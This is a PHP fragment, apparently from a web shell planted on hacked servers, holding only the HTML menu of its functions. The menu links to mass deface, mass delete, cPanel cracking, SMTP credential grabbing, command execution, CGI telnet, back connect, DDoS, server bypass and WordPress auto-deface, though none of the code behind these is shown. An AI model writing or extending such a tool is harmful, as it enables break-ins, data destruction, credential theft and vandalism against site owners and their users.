echo "<li> <a href='?'>Home</a> </li>";
echo "<a style='color: red;' href='?dir=$dir&do=infosys'>Info Website</a> </li>";
echo "<li> <a href='?dir=$dir&do=upload'>Upload</a> </li>";
echo "<li> <a href='?do=symlink'>symlink</a> </li>";
echo "<li> <a href='?do=config'>Config</a> </li>";
echo "<li> <a href='?do=jumping'>Jumping</a> </li>";
echo "<li> <a href='?do=mass_delete'>Mass Delete</a> </li>";
echo "<li> <a href='?do=mass_deface'>Mass Deface</a> </li>";
echo "<li> <a href='?do=cpanel'>CPanel Crack</a> </li>";
echo "<li> <a href='?do=smtp'>SMTP Grabber</a> </li>";
echo "<br><br><li> <a href='?do=fake_root'>Fake Root</a> </li>";
echo "<li> <a href='?do=auto_edit_user'>Auto Edit User</a> </li>";
echo "<li> <a href='?do=auto_wp'>Auto Edit Title</a> </li>";
echo "<li> <a href='?do=zoneh'>Zone-H</a> </li>";
echo "<li> <a href='?do=auto_dwp'>WordPress Auto Deface</a> </li>";
echo "<li> <a href='?do=cpftp_auto'>CFTP Auto Deface</a> </li>";
echo "<li> <a href='?do=krdp_shell'>KRDP Shell</a> </li>";
echo "<li> <a href='?do=network'>network</a> </li>";
echo "<li> <a href='?do=about'>about</a> </li>";
echo "<br><br><li> <a href='?do=adminer'>Adminer</a> </li>";
echo "<li> <a href='?do=tool'>Tool</a>";
echo "<li> <a href='?do=admf'>Admin Finder</a> </li>";
echo "<li> <a href='?do=cmd'>Command</a> </li>";echo "<li> <a href='?dir=$dir&do=autoklik'>Priv Auto Deface</a> </li>";
echo "<li> <a href='?do=whois'>Whois</a> </li>";
echo "<li> <a href='?do=cgi'>CGI Telnet</a> </li>";
echo "<li> <a href='?do=csrf'>CSRF Online</a> </li>";
echo "<br><br><li> <a href='?do=ddos'>DDos</a> </li>";
echo "<li> <a href='?do=shellscanner'>Shell Scanner</a> </li>";
echo "<li> <a href='?do=endeco'>Encode Decode</a> </li>";
echo "<li> <a href='?xp=bypassserver'>Full bypass</a> </li>";
echo "<li> <a href='?do=defacerid'>DefacerID</a> </li>";
echo "<li> <a href='?do=bconnet'>Back Connect</a> </li>";
echo "<li> <a style='color: red;' href='?logout=true'>Logout</a> </li>";
echo "<br>";
echo "<br>";
echo "<BR>";
echo "<hr>";
